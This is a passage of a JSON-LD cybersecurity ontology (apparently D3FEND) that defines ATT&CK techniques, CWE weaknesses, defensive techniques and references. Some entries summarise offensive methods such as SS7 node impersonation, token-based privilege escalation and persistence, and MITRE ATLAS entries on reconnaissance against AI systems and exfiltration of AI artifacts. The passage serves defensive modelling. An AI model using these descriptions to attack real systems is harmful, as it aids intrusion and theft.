        {
          "@id": "http://dbpedia.org/resource/Symbolic_link#Shortcuts"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ShortcutFile"
      },
      "skos:altLabel": "Shell Link"
    },
    {
      "@id": "d3f:T1430.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1430.002",
      "d3f:definition": "Adversaries may exploit the lack of authentication in signaling system network nodes to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport)",
      "rdfs:label": "Impersonate SS7 Nodes - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1430"
      },
      "skos:prefLabel": "Impersonate SS7 Nodes"
    },
    {
      "@id": "d3f:ApplicationFailureCountVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Variables that keep count of various failures and errors.",
      "rdfs:comment": "Differenct controller brands have different system tags to monitor various aspects, for example in Allen-Bradley you might use S:ERR, T4:0.DN, C5:0.OV; respectively System error, timer/counter status bits",
      "rdfs:label": "Application Failure Count Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:CWE-1091",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1091",
      "d3f:definition": "The product contains a method that accesses an object but does not later invoke the element's associated finalize/destructor method.",
      "rdfs:label": "Use of Object without Invoking Destructor Method",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1076"
        },
        {
          "@id": "d3f:CWE-772"
        }
      ]
    },
    {
      "@id": "d3f:InboundInternetNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Inbound internet traffic is network traffic from a host outside a given network initiated on an incoming connection to a host inside that network.",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Inbound Internet Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InboundNetworkTraffic"
        },
        {
          "@id": "d3f:InternetNetworkTraffic"
        },
        {
          "@id": "_:N643eb8bf244f47078f2ef0eb3fe13f1b"
        }
      ]
    },
    {
      "@id": "_:N643eb8bf244f47078f2ef0eb3fe13f1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-1119",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1119",
      "d3f:definition": "The code uses too many unconditional branches (such as \"goto\").",
      "rdfs:label": "Excessive Use of Unconditional Branching",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1501",
      "@type": "owl:Class",
      "d3f:attack-id": "T1501",
      "d3f:definition": "Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.002",
      "rdfs:label": "Systemd Service",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-278",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-278",
      "d3f:definition": "A product inherits a set of insecure permissions for an object, e.g. when copying from an archive file, without user awareness or involvement.",
      "rdfs:label": "Insecure Preserved Inherited Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:contains",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "d3f:definition": "x contains y: A core relation that holds between a whole x and its part y.  Equivalent to relational concept 'has part' and thus transitive.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02639021-v"
      },
      "rdfs:label": "contains",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-contain"
        }
      ]
    },
    {
      "@id": "d3f:T1134.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.002",
      "d3f:copies": {
        "@id": "d3f:AccessToken"
      },
      "d3f:definition": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)",
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Create Process with Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:N5d3201d94fad43fb8be613fff8c83db0"
        },
        {
          "@id": "_:N7ebc4496d364424a92a7e644f0ec9f12"
        }
      ]
    },
    {
      "@id": "_:N5d3201d94fad43fb8be613fff8c83db0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "_:N7ebc4496d364424a92a7e644f0ec9f12",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:UserAccountCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the creation of a new user account within a system or domain.",
      "rdfs:label": "User Account Creation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccountEvent"
      }
    },
    {
      "@id": "d3f:AML.T0000.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0000.002",
      "d3f:definition": "Research labs at academic institutions and company R&D divisions often have blogs that highlight their use of artificial intelligence and its application to the organization's unique problems.\nIndividual researchers also frequently document their work in blogposts.\nAn adversary may search for posts made by the target victim organization or its employees.\nIn comparison to [Journals and Conference Proceedings](/techniques/AML.T0000.000) and [Pre-Print Repositories](/techniques/AML.T0000.001) this material will often contain more practical aspects of the AI system.\nThis could include underlying technologies and frameworks used, and possibly some information about the API access and use case.\nThis will help the adversary better understand how that organization is using AI internally and the details of their approach that could aid in tailoring an attack.",
      "rdfs:label": "Technical Blogs - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0000.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0000"
      },
      "skos:prefLabel": "Technical Blogs"
    },
    {
      "@id": "d3f:T1592.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592.003",
      "d3f:definition": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).",
      "rdfs:label": "Firmware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1592"
      }
    },
    {
      "@id": "d3f:Reference-AnalysisOfTheWindowsVistaSecurityModel_SymantecCorporation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://web.archive.org/web/20140407025337/http://www.symantec.com/avcenter/reference/Windows_Vista_Security_Model_Analysis.pdf"
      },
      "d3f:kb-abstract": "This     paper     provides     an     in-depth     technical     assessment    of    the    security    improvements    implemented    in    Windows Vista, focusing primarily on the areas of User Account Protection  and  User  Interface  Privilege  Isolation.  This  paper  discusses   these   features   and   touches   on   several   of   their   shortcomings. It then demonstrates how it is possible to combine these  attacks  to  gain  full  control  over  the  machine  from  low  integrity, low privilege process.",
      "d3f:kb-author": "Matthew Conover",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Symantec Corporation",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:kb-reference-title": "Analysis of the Windows Vista Security Model",
      "rdfs:label": "Reference - Analysis of the Windows Vista Security Model - Symantec Corporation"
    },
    {
      "@id": "d3f:WindowsRegistryEvent",
      "@type": "owl:Class",
      "d3f:definition": "Events involving interactions with the Windows Registry, including keys, values, and associated security configurations.",
      "rdfs:label": "Windows Registry Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N5dade0f07ffa4e8798a7ee691eeed2a2"
        }
      ]
    },
    {
      "@id": "_:N5dade0f07ffa4e8798a7ee691eeed2a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistry"
      }
    },
    {
      "@id": "d3f:NetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:NetworkPacket"
      },
      "d3f:definition": "Network traffic or data traffic is the data, or alternatively the amount of data, moving across a network at a given point of time.  Network data in computer networks is mostly encapsulated in network packets, which provide the load in the network.",
      "d3f:may-contain": [
        {
          "@id": "d3f:DomainName"
        },
        {
          "@id": "d3f:RemoteCommand"
        }
      ],
      "d3f:originates-from": {
        "@id": "d3f:PhysicalLocation"
      },
      "rdfs:label": "Network Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Network_traffic"
        },
        {
          "@id": "https://schema.ocsf.io/objects/network_traffic"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N04f90ec93d324eefaea85ebfc9f592c2"
        },
        {
          "@id": "_:Ne50d59ea7f4b40e9bf568bd5fa04c1fa"
        },
        {
          "@id": "_:N370bb106275d4133b4515cd986ef4c76"
        },
        {
          "@id": "_:Nade1915eb98043a09b6adec531ee680a"
        }
      ],
      "skos:altLabel": "Data Traffic"
    },
    {
      "@id": "_:N04f90ec93d324eefaea85ebfc9f592c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkPacket"
      }
    },
    {
      "@id": "_:Ne50d59ea7f4b40e9bf568bd5fa04c1fa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainName"
      }
    },
    {
      "@id": "_:N370bb106275d4133b4515cd986ef4c76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemoteCommand"
      }
    },
    {
      "@id": "_:Nade1915eb98043a09b6adec531ee680a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:originates-from"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLocation"
      }
    },
    {
      "@id": "d3f:T1489",
      "@type": "owl:Class",
      "d3f:attack-id": "T1489",
      "d3f:definition": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)",
      "rdfs:label": "Service Stop",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:ServiceAccount",
      "@type": "owl:Class",
      "d3f:definition": "A service account is a type of account used by an application or service to interact with the operating system.",
      "d3f:synonym": "System Account",
      "rdfs:label": "Service Account",
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-002729_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined security safeguards to protect the integrity of boot firmware in organization-defined devices.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002729"
    },
    {
      "@id": "d3f:T1614",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:ConfigurationResource"
      },
      "d3f:attack-id": "T1614",
      "d3f:definition": "Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "rdfs:label": "System Location Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N122ce95548c94afdb2a0b6fab1e49cab"
        }
      ]
    },
    {
      "@id": "_:N122ce95548c94afdb2a0b6fab1e49cab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:BayesianLinearRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BLR",
      "d3f:definition": "Bayesian linear regression is a type of conditional modeling in which the mean of one variable is described by a linear combination of other variables, with the goal of obtaining the posterior probability of the regression coefficients.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Bayesian linear regression. [Link](https://en.wikipedia.org/wiki/Bayesian_linear_regression)",
      "rdfs:label": "Bayesian Linear Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:T1583",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583",
      "d3f:definition": "Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.",
      "rdfs:label": "Acquire Infrastructure",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForIdentifyingThePresenceOfMalwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9807114B2/en?oq=US-9807114-B2"
      },
      "d3f:kb-abstract": "A system for identifying the presence of advanced persistent threats on a network including a plurality of resources, interconnected to form a network, at least one decoy resource, at least one mini-trap installed on at least one of the plurality of resources and functionally associated with at one of the at least one decoy resource, the at least one mini-trap comprising deceptive information directing malware accessing the at least one mini-trap to the decoy resource associated therewith, and a manager node forming part of the network, locally or remotely, and configured to manage placement of the at least one mini-trap on the at least one of the plurality of resources and association between the at least one mini-trap and the decoy resource associated therewith.",
      "d3f:kb-author": "Doron Kolton; Rami Mizrahi; Omer Zohar; Benny Ben-Rabi; Alex Barbalat; Shlomi Gabai",
      "d3f:kb-mitre-analysis": "Questionable or all files (as determined by the enterprise) are forwarded to the decoy network. Using a manager node user interface, you can setup fake information (ex. IP address of a decoy FTP server)\nand deploy decoy physical or virtual endpoints.",
      "d3f:kb-organization": "Fidelis Cybersecurity Solutions Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DecoyNetworkResource"
        },
        {
          "@id": "d3f:DecoyUserCredential"
        }
      ],
      "d3f:kb-reference-title": "System and method for identifying the presence of malware using mini-traps set at network endpoints",
      "rdfs:label": "Reference - System and method for identifying the presence of malware using mini-traps set at network endpoints - Fidelis Cybersecurity Solutions Inc"
    },
    {
      "@id": "d3f:enumerates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x enumerates y: The subject x takes the action of reading from a digital source y to acquire data and create a list of its contents.",
      "rdfs:label": "enumerates",
      "rdfs:subPropertyOf": {
        "@id": "d3f:reads"
      }
    },
    {
      "@id": "d3f:ATTACKICSLateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0109"
      },
      "rdfs:label": "Lateral Movement Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N491085505b7848448492af2ba0b0ad58"
        }
      ],
      "skos:prefLabel": "Lateral Movement Technique"
    },
    {
      "@id": "_:N491085505b7848448492af2ba0b0ad58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0109"
      }
    },
    {
      "@id": "d3f:AMD64CodeSegment",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ImageCodeSegment",
        "d3f:ProcessCodeSegment"
      ],
      "rdfs:label": "AMD64 Code Segment"
    },
    {
      "@id": "d3f:CWE-692",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-692",
      "d3f:definition": "The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed.",
      "rdfs:label": "Incomplete Denylist to Cross-Site Scripting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-184"
        },
        {
          "@id": "d3f:CWE-79"
        }
      ]
    },
    {
      "@id": "d3f:Reference-HowToChangeRegistryValuesOrPermissionsFromACommandLineOrAScript",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/troubleshoot/windows-client/application-management/change-registry-values-permissions"
      },
      "d3f:kb-abstract": "This article describes how to change registry values or permissions from a command line or a script.\n\nApplies to:   Windows 10 - all editions, Windows Server 2012 R2\nOriginal KB number:   264584",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-title": "How to change registry values or permissions from a command line or a script",
      "rdfs:label": "Reference - How to change registry values or permissions from a command line or a script"
    },
    {
      "@id": "d3f:CWE-9",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-9",
      "d3f:definition": "If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the product.",
      "rdfs:label": "J2EE Misconfiguration: Weak Access Permissions for EJB Methods",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-266"
      }
    },
    {
      "@id": "d3f:AML.TA0010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0010",
      "d3f:definition": "The adversary is trying to steal AI artifacts or other information about the AI system.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network.\nData may be stolen for its valuable intellectual property, or for use in staging future operations.\n\nTechniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.",
      "rdfs:label": "Exfiltration - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Exfiltration"
    },
    {
      "@id": "d3f:ReissueCredential",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ReissueCredential"
      ],
      "d3f:d3fend-id": "D3-RIC",
      "d3f:definition": "Issue a new credential to a user which supercedes their old credential.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Reissue Credential",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreAccess"
        },
        {
          "@id": "_:N69ba1dbe3f2048578c846ea8d37ec60c"
        }
      ]
    },
    {
      "@id": "_:N69ba1dbe3f2048578c846ea8d37ec60c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:OTRemoteModeCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Command that places the controller in a mode capable of receiving read/write communication from a networked entity.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Remote Mode Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N063a6280f0fc469985b315c41914f09e"
        }
      ]
    },
    {
      "@id": "_:N063a6280f0fc469985b315c41914f09e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:RestoreNetworkAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreNetworkAccess"
      ],
      "d3f:d3fend-id": "D3-RNA",
      "d3f:definition": "Restoring a entity's access to a computer network.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Host"
      },
      "rdfs:label": "Restore Network Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreAccess"
        },
        {
          "@id": "_:Nd3c31ad4d8ad4cf59b2438119176b4c7"
        }
      ]
    },
    {
      "@id": "_:Nd3c31ad4d8ad4cf59b2438119176b4c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:MemoryAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": {
        "@id": "d3f:MemoryWord"
      },
      "d3f:definition": "In computing, a memory address is a reference to a specific memory location used at various levels by software and hardware.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Memory_address"
      },
      "rdfs:label": "Memory Address",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:N967fe0cb97dc47539fa62771ddaba238"
        }
      ]
    },
    {
      "@id": "_:N967fe0cb97dc47539fa62771ddaba238",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryWord"
      }
    },
    {
      "@id": "d3f:Reference-TCGTrustedAttestationProtocolUseCasesForTPMFamilies1.2And2.0AndDICE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://trustedcomputinggroup.org/wp-content/uploads/TCG_TNC_TAP_Use_Cases_v1r0p35_published.pdf"
      },
      "d3f:kb-reference-title": "TCG Trusted Attestation Protocol Use Cases for TPM Families 1.2 and 2.0 and DICE",
      "rdfs:label": "Reference - TCG Trusted Attestation Protocol Use Cases for TPM Families 1.2 and 2.0 and DICE"
    },
    {
      "@id": "d3f:PointEstimation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PE",
      "d3f:definition": "A point estimation is a single value that estimates the parameter. Point estimates are single values calculated from the sample",
      "d3f:kb-article": "## References\nPennsylvania State University. (n.d.). Statistical Inference and Estimation. [Link](https://online.stat.psu.edu/stat504/lesson/statistical-inference-and-estimation)",
      "rdfs:label": "Point Estimation",
      "rdfs:subClassOf": {
        "@id": "d3f:Estimation"
      }
    },
    {
      "@id": "d3f:T1068",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1068",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.",
      "d3f:enables": {
        "@id": "d3f:TA0004"
      },
      "d3f:may-modify": {
        "@id": "d3f:StackFrame"
      },
      "d3f:modifies": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "rdfs:label": "Exploitation for Privilege Escalation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:N33225ba32a614353ab830627544401d5"
        },
        {
          "@id": "_:Nfac977de993a44279719640cb7cd5df0"
        },
        {
          "@id": "_:Nfad5a24d850a419e8bcf863289fb28af"
        }
      ]
    },
    {
      "@id": "_:N33225ba32a614353ab830627544401d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0004"
      }
    },
    {
      "@id": "_:Nfac977de993a44279719640cb7cd5df0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "_:Nfad5a24d850a419e8bcf863289fb28af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:DisplayServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A display server or window server is a program whose primary task is to coordinate the input and output of its clients to and from the rest of the operating system, the hardware, and each other. The display server communicates with its clients over the display server protocol, a communications protocol, which can be network-transparent or simply network-capable. The display server is a key component in any graphical user interface, specifically the windowing system.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Display_server"
      },
      "rdfs:label": "Display Server",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Window Server"
    },
    {
      "@id": "d3f:WebApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application which is delivered by a web server over HTTP protocols that is presented to a client web browser.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Web_application"
      },
      "rdfs:label": "Web Application",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplication"
      },
      "skos:altLabel": [
        "Web App",
        "Web Application"
      ]
    },
    {
      "@id": "d3f:WebAccessToken",
      "@type": "owl:Class",
      "d3f:definition": "A web access token is a credential that allows a web client application to access a specific resource to perform specific actions on behalf of the user.",
      "d3f:synonym": "WAT",
      "rdfs:label": "Web Access Token",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:JSON_Web_Token"
        },
        {
          "@id": "https://auth0.com/blog/id-token-access-token-what-is-the-difference/"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:SessionToken"
      }
    },
    {
      "@id": "d3f:T1037",
      "@type": "owl:Class",
      "d3f:attack-id": "T1037",
      "d3f:definition": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.",
      "rdfs:label": "Boot or Logon Initialization Scripts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-193",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-193",
      "d3f:definition": "A product calculates or uses an incorrect maximum or minimum value that is 1 more, or 1 less, than the correct value.",
      "d3f:synonym": "off-by-five",
      "rdfs:label": "Off-by-one Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:may-be-deceived-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be deceived by",
      "owl:inverseOf": {
        "@id": "d3f:may-deceive"
      },
      "rdfs:label": "may-be-deceived-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:Reference-MockAttackCybersecurityTrainingSystemAndMethods_WOMBATSECURITYTECHNOLOGIESInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9558677B2/"
      },
